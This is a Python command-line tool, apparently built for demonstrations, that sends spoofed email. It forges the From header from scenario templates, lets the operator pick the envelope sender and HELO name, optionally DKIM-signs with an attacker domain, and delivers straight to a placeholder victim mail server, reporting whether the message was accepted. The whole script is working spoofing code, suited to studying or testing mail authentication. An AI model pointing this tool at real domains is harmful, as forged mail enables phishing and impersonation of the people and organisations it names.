325 lines
10 KiB
Python
Executable File
325 lines
10 KiB
Python
Executable File
#!/usr/bin/env python3
|
||
|
||
from argparse import ArgumentParser
|
||
from email.message import EmailMessage
|
||
import email.utils
|
||
import importlib.resources
|
||
import json
|
||
import pathlib
|
||
import re
|
||
import smtplib
|
||
import sys
|
||
import uuid
|
||
|
||
import dkim
|
||
from rich.console import Console
|
||
import rich.highlighter
|
||
import rich.panel
|
||
from rich.prompt import Confirm, Prompt
|
||
import rich.text
|
||
from rich.theme import Theme
|
||
|
||
import spoof_templates
|
||
|
||
# --- Attacker side ---------------------------------------------------------
# Hostname offered as the default HELO/EHLO name (prompt and --helo option);
# also used as the domain part of generated Message-IDs.
DEFAULT_HELO = "attaquant.example"
# Default signing domain proposed when adding a DKIM signature.
ATTACKER_DOMAIN = "attaquant.example"
# Envelope sender offered as the alternative to the header From address.
ATTACKER_MAIL_FROM = "usurpateur@attaquant.example"

# --- Victim side -----------------------------------------------------------
# Display name and domain of the recipient of every generated message.
VICTIM_NAME = "Destinataire"
VICTIM_DOMAIN = "destinataire.example"
# Host that send_email() connects to.
VICTIM_MX = "mx.destinataire.example"
# Recipient mailbox, used both in the To header and as the RCPT TO address.
VICTIM_ADDRESS = "destinataire@" + VICTIM_DOMAIN
|
||
|
||
|
||
class SMTPHighlighter(rich.highlighter.Highlighter):
    """Rich highlighter that styles the key identifier of one SMTP command.

    ``state`` selects which entry of ``patterns`` is applied.  It starts as
    ``'connect'``, for which no pattern exists, so nothing is styled until
    the state is switched to one of the pattern keys.
    """

    # One regular expression per state.  Each named group is also the name
    # of the style applied to the span that group matched.
    patterns = {
        'helo': r'(?:HELO|EHLO) (?P<helo>.*)',
        'mail_from': r'MAIL FROM:<(?P<mail_from>.*?)>',
        'rcpt_to': r'RCPT TO:<(?P<rcpt_to>.*)>',
        'data': r'From: (?P<data_display_name>.* <(?P<data_from>.*)>)'
    }

    def __init__(self, **kwargs):
        super().__init__(**kwargs)
        self.state = 'connect'

    def highlight(self, text):
        """Stylize ``text`` in place according to the pattern of the current state.

        The pattern is anchored at the start of ``text.plain``; when the
        state has no pattern or the text does not match, ``text`` is left
        untouched.
        """
        pattern = SMTPHighlighter.patterns.get(self.state)
        if not pattern:
            return

        found = re.match(pattern, text.plain)
        if not found:
            return

        for style_name in found.groupdict():
            first, last = found.span(style_name)
            text.stylize(style_name, first, last)
|
||
|
||
|
||
|
||
|
||
# Named styles referenced from console markup and from the SMTP trace.
custom_theme = Theme({
    # Banner panel.
    "banner": "bold red",

    # Direction arrows of the SMTP dialogue.
    "incoming": "yellow",
    "outgoing": "cyan",

    # Identifiers carried by the SMTP commands and the From header.
    "helo": "bold sea_green1",
    "mail_from": "bold underline sky_blue1",
    "rcpt_to": "bold underline pale_violet_red1",
    "data_from": "bold underline medium_purple1",
    "data_display_name": "medium_purple1",

    # Annotations and final verdict.
    "comment": "#777777",
    "failure": "bold red",
    "success": "green",

    # Plain trace lines.
    "text": "default"
})

# Single console shared by every function in this script.
console = Console(theme=custom_theme, highlighter=None)
|
||
|
||
|
||
class SMTP(smtplib.SMTP):
    """``smtplib.SMTP`` client that records, and optionally prints, the dialogue.

    Everything sent (``send``) and every reply received (``getreply``) goes
    through ``trace``, which appends an entry to ``self.log`` and, when
    ``output`` is truthy, prints it on the module-level ``console``.

    ``self.highlighter.state`` is kept in sync with the SMTP phase by the
    ``ehlo``/``mail``/``rcpt``/``data`` overrides, but ``trace`` does not
    currently run the highlighter over the text.

    Args:
        output: when truthy, the dialogue is printed as it happens.
        **kwargs: forwarded unchanged to ``smtplib.SMTP``.
    """

    def __init__(self, output, **kwargs):
        # Initialise our own state first: smtplib.SMTP.__init__ connects
        # immediately when a host is supplied, and that already goes through
        # connect()/getreply()/trace(), which need these attributes.
        self.highlighter = SMTPHighlighter()
        self.log = []
        self.output = output
        super().__init__(**kwargs)

    def trace(self, s, direction):
        """Record one message of the dialogue and optionally print it.

        Args:
            s: the message, as ``str`` or ``bytes`` (decoded as UTF-8, with
                undecodable bytes replaced).
            direction: ``'in'`` for server replies, ``'out'`` for data sent.

        Raises:
            ValueError: if ``direction`` is neither ``'in'`` nor ``'out'``.
        """
        if direction not in ('in', 'out'):
            raise ValueError("direction must be 'in' or 'out'")

        arrows = {'in': '[incoming]←[/]', 'out': '[outgoing]→[/]'}
        max_lines = 4

        if isinstance(s, bytes):
            # The peer controls these bytes; never let a bad byte abort the
            # SMTP session just because it cannot be displayed.
            s = s.decode('utf-8', errors='replace')

        lines = [{'class': 'text', 'text': text} for text in s.splitlines()]

        # Keep the first `max_lines` lines and the last one; everything in
        # between is collapsed into a single comment.  Collapse only when at
        # least one line is actually hidden, otherwise a "0 lines omitted"
        # marker would make the output longer than the original.
        suppressed_count = len(lines) - max_lines - 1
        if suppressed_count >= 1:
            if suppressed_count > 1:
                suppressed_text = f"{suppressed_count} lignes omises"
            else:
                suppressed_text = f"{suppressed_count} ligne omise"
            suppressed_obj = {'class': 'comment', 'text': suppressed_text}

            lines = lines[:max_lines] + [suppressed_obj] + lines[-1:]

        # Print the text on the console
        if self.output:
            for i, entry in enumerate(lines):
                # Only the first line of a message carries the direction arrow.
                prefix = arrows[direction] if i == 0 else " "
                console.print(f" {prefix} ", end=None)
                # The text comes from the wire: print it literally, without
                # interpreting "[...]" as markup or ":name:" as an emoji code.
                console.print(entry['text'], style=entry['class'],
                              markup=False, emoji=False)

            if direction == 'in':
                # Blank line after each server reply.
                console.print()

        # Save it internally too
        self.log.append({'direction': direction, 'lines': lines})

    def putcmd(self, cmd, args=''):
        """Send ``cmd`` in upper case."""
        super().putcmd(cmd.upper(), args)

    def send(self, s):
        """Trace ``s`` as outgoing, then send it."""
        self.trace(s, 'out')
        super().send(s)

    def getreply(self):
        """Read a server reply, trace it in wire format and return it unchanged."""
        errcode, errmsg = super().getreply()
        # errors='replace': reply text is server-controlled and may not be
        # ASCII.  `or ['']`: keep one (empty) line so that the status code is
        # still traced when the reply carries no text at all.
        texts = errmsg.decode('us-ascii', errors='replace').splitlines() or ['']
        last = len(texts) - 1
        # Rebuild the multi-line reply format: "code-text" on continuation
        # lines, "code text" on the final one.
        wire_lines = [
            f"{errcode}{' ' if i == last else '-'}{text}"
            for i, text in enumerate(texts)
        ]
        self.trace('\n'.join(wire_lines), 'in')
        return errcode, errmsg

    def connect(self, *args, **kwargs):
        """Add a connection comment to the log, then connect."""
        # The comment is logged before the connection attempt so that it
        # precedes the server greeting in the log.
        self.log.append({'direction': 'comment',
                         'lines': [{'class': 'comment',
                                    'text': 'Connexion établie au serveur'}]})
        return super().connect(*args, **kwargs)

    def ehlo(self, *args, **kwargs):
        """Switch the highlighter to the 'helo' state, then send EHLO."""
        self.highlighter.state = 'helo'
        return super().ehlo(*args, **kwargs)

    def mail(self, *args, **kwargs):
        """Switch the highlighter to the 'mail_from' state, then send MAIL."""
        self.highlighter.state = 'mail_from'
        return super().mail(*args, **kwargs)

    def rcpt(self, *args, **kwargs):
        """Switch the highlighter to the 'rcpt_to' state, then send RCPT."""
        self.highlighter.state = 'rcpt_to'
        return super().rcpt(*args, **kwargs)

    def data(self, *args):
        """Switch the highlighter to the 'data' state, then send DATA."""
        self.highlighter.state = 'data'
        return super().data(*args)
|
||
|
||
|
||
|
||
def ask_helo():
    """Prompt for the hostname to announce in HELO.

    Returns:
        The operator's answer, or ``DEFAULT_HELO`` when the prompt's default
        is accepted.
    """
    return Prompt.ask(
        "Nom d’hôte dans le [helo]HELO[/helo]",
        default=DEFAULT_HELO,
        console=console,
    )
|
||
|
||
def ask_mail_from(default_mail_from):
    """Ask which address to use as the SMTP envelope sender (RFC5321.MailFrom).

    Two options are offered: reuse the header From address, or use
    ``ATTACKER_MAIL_FROM``.  The question is repeated until a valid option
    number is entered.

    Args:
        default_mail_from: the RFC5322.From address, offered as option 1.

    Returns:
        The selected address.
    """
    console.print("Adresse RFC5321.MailFrom :")
    console.print(f" 1. Utiliser le même que le RFC5322.From ([b]{default_mail_from}[/])")
    console.print(f" 2. Remplacer par une adresse qu’on maîtrise ([b]{ATTACKER_MAIL_FROM}[/])")
    console.print()

    choices = {
        1: default_mail_from,
        2: ATTACKER_MAIL_FROM,
    }

    while True:
        response = Prompt.ask("Choix", console=console)
        try:
            result = choices[int(response)]
        except (ValueError, KeyError):
            # ValueError: the answer is not a number.
            # KeyError: it is a number, but not one of the listed options
            # (`choices` is a dict, so a bad number is a KeyError, not an
            # IndexError).
            continue

        console.print(f" ⇒ [mail_from]{result}[/]")
        return result
|
||
|
||
|
||
def add_dkim_signature(email):
    """Optionally add a DKIM-Signature header to ``email``.

    The operator is asked whether to sign.  If so, a selector and a signing
    domain are prompted for, the private key is read from
    ``<selector>.private`` in the current directory, and the resulting
    signature is added to the message.

    Args:
        email: the message to sign; it is modified in place.

    Returns:
        The same ``email`` object, signed or not.

    Raises:
        OSError: if the private key file cannot be read.
        ValueError: if the signer returns something that is not a
            ``DKIM-Signature`` header line.
    """
    # `choices` must be a list: with a plain string, membership becomes a
    # substring test and an answer such as "on" is accepted and read as "no".
    wants_signature = Confirm.ask("Ajouter une signature DKIM ?",
                                  choices=["o", "n"],
                                  default=False,
                                  console=console)
    if not wants_signature:
        console.print(" ⇒ Pas de signature DKIM")
        return email

    email_bytes = email.as_string().encode('utf-8')
    selector = Prompt.ask("Sélecteur", console=console)
    private_key = pathlib.Path(f"{selector}.private").read_bytes()
    domain = Prompt.ask("Domaine", default=ATTACKER_DOMAIN, console=console)

    signature_line = dkim.dkim_sign(email_bytes,
                                    selector.encode('ascii'),
                                    domain.encode('ascii'),
                                    private_key).decode('ascii')

    # The signer returns a complete header line; keep only its value (DOTALL
    # because the value spans several folded lines).
    # NOTE(review): the captured value may still contain folding CRLFs;
    # whether the message object accepts that depends on its policy — verify
    # against the objects produced by spoof_templates.
    mobj = re.match("^DKIM-Signature: (.*)\r\n", signature_line, re.DOTALL)
    if mobj is None:
        raise ValueError("unexpected output from dkim_sign: "
                         "not a DKIM-Signature header line")

    email['DKIM-Signature'] = mobj.group(1)
    console.print(" ⇒ Signature DKIM ajoutée")
    return email
|
||
|
||
|
||
|
||
def generate_email(template):
    """Build the message to send from a scenario template.

    Adds the To, Date and Message-ID headers, plus a plain-text UTF-8
    Content-Type when the template does not define one.

    Args:
        template: a scenario object exposing the base message as ``.msg``.

    Returns:
        A new message object; ``template.msg`` itself is left untouched.
    """
    import copy  # local import: only needed here

    # Work on a copy: assigning a header on a message adds to it, so filling
    # in the shared template message would leave it altered for any later use.
    msg = copy.deepcopy(template.msg)

    msg['To'] = f"{VICTIM_NAME} <{VICTIM_ADDRESS}>"
    msg['Date'] = email.utils.formatdate()
    # RFC 5322 requires the message identifier to be enclosed in angle brackets.
    msg['Message-ID'] = f"<{uuid.uuid4()}@{DEFAULT_HELO}>"
    if not msg['Content-Type']:
        msg['Content-Type'] = "text/plain; charset=utf-8"

    return msg
|
||
|
||
|
||
def ask_template():
    """List the available scenarios and ask the operator to pick one.

    The question is repeated until the answer is the number of a listed
    scenario.

    Returns:
        The selected template object.
    """
    templates = spoof_templates.spoof_templates()

    console.print("[bold]Sélectionner un scénario :[/]")
    for number, template in enumerate(templates, start=1):
        console.print(f"{number:4}. {template.nice_name}")
    console.print()

    while True:
        response = Prompt.ask("Choix", console=console)
        try:
            number = int(response)
        except ValueError:
            continue

        # Check the range explicitly: with plain indexing, 0 or a negative
        # number would silently select a scenario counted from the end.
        if not 1 <= number <= len(templates):
            continue

        result = templates[number - 1]
        console.print(f" ⇒ [bold]{result.nice_name}[/]")
        console.print()
        return result
|
||
|
||
|
||
|
||
|
||
def send_email(helo, envelope_from, email, output=True):
    """Send ``email`` to ``VICTIM_ADDRESS`` through ``VICTIM_MX``.

    Args:
        helo: hostname announced to the server.
        envelope_from: address used in MAIL FROM.
        email: the message object to send.
        output: when truthy, the SMTP dialogue is printed as it happens.

    Returns:
        A dict with ``'outcome'`` (``'success'`` or ``'failure'``) and
        ``'log'`` (the recorded SMTP dialogue).

    Raises:
        Any exception that is not an ``smtplib.SMTPException`` is propagated
        unchanged.
    """
    data = email.as_string().encode('utf-8')
    smtp = SMTP(local_hostname=helo, output=output)

    outcome = 'failure'
    try:
        with smtp:
            smtp.connect(VICTIM_MX)
            smtp.sendmail(envelope_from, VICTIM_ADDRESS, data)
            outcome = 'success'
    except smtplib.SMTPException:
        # Either the server refused the message (outcome is still 'failure'),
        # or the QUIT issued when the `with` block exits went wrong after the
        # verdict was already known; in both cases `outcome` is accurate.
        pass

    return {'outcome': outcome, 'log': smtp.log}
|
||
|
||
|
||
def interactive_main():
    """Run the interactive session.

    Steps: show the banner, pick a scenario, pick the envelope sender and the
    HELO name, build the message, optionally DKIM-sign it, send it and report
    whether the server accepted it.  Ctrl-C ends the session quietly.
    """
    try:
        banner = rich.panel.Panel(
            "🕱 Outil d’usurpation d’identité de courriel 🕱",
            style="banner",
            width=80)
        console.print(banner)
        console.print()

        template = ask_template()

        # Split the scenario's From header into display name and address.
        header_from = re.match('(.*) <(.*)>', template.msg['From'])
        display_name, rfc5322from = header_from.groups()
        console.print("Adresse RFC5322.From (tirée du scénario):")
        console.print(f" ⇒ [data_display_name]{display_name} <[data_from]{rfc5322from}[/data_from]>[/]")
        console.print()

        envelope_from = ask_mail_from(rfc5322from)
        console.print()

        helo = ask_helo()
        console.print()

        message = generate_email(template)
        signed_message = add_dkim_signature(message)

        results = send_email(helo, envelope_from, signed_message, output=True)

        # One verdict line per known outcome; any other outcome prints nothing.
        verdicts = {
            'success': " [success]✔[/] Message [success]accepté[/] par le serveur SMTP",
            'failure': " [failure]✘[/] Message [failure]rejeté[/] par le serveur SMTP",
        }
        verdict = verdicts.get(results['outcome'])
        if verdict is not None:
            console.print(verdict)

    except KeyboardInterrupt:
        # Finish the interrupted prompt line and leave without a traceback.
        console.print()
|
||
|
||
|
||
|
||
def main():
    """Command-line entry point.

    Without ``--non-interactive`` the interactive session is started.  With
    it, either the configuration (``--get-config``) or the result of sending
    the scenario named by ``--template`` is printed on stdout as JSON.
    """
    parser = ArgumentParser()
    parser.add_argument('--non-interactive', default=False, action='store_true')
    parser.add_argument('--get-config', default=False, action='store_true')
    parser.add_argument('--template')
    parser.add_argument('--replace-rfc5321-mail-from', default=False, action='store_true')
    parser.add_argument('--helo', default=DEFAULT_HELO)

    args = parser.parse_args()

    if not args.non_interactive:
        interactive_main()
        return

    if args.get_config:
        template_entries = []
        for t in spoof_templates.spoof_templates():
            # Parse the From header once and reuse both parts.
            from_name, from_address = re.match('(.*) <(.*)>', t.msg['From']).groups()
            template_entries.append({'id': t.name,
                                     'name': t.nice_name,
                                     'from_name': from_name,
                                     'from_address': from_address})

        config = {
            'default_helo': DEFAULT_HELO,
            'my_mail_from': ATTACKER_MAIL_FROM,
            'templates': template_entries,
        }
        print(json.dumps(config))
        return

    templates = {t.name: t for t in spoof_templates.spoof_templates()}
    template = templates.get(args.template)
    if template is None:
        # A missing or unknown --template is a usage error: report it through
        # argparse instead of failing with a KeyError traceback.
        known = ', '.join(str(name) for name in templates)
        parser.error(f"--template must be one of: {known}")

    rfc5322from = re.match('.* <(.*)>', template.msg['From']).group(1)
    if args.replace_rfc5321_mail_from:
        envelope_from = ATTACKER_MAIL_FROM
    else:
        envelope_from = rfc5322from

    message = generate_email(template)
    results = send_email(args.helo, envelope_from, message, output=False)
    print(json.dumps(results))
|
||
|
||
# Run the command-line entry point only when executed as a script.
if __name__ == "__main__":
    main()
|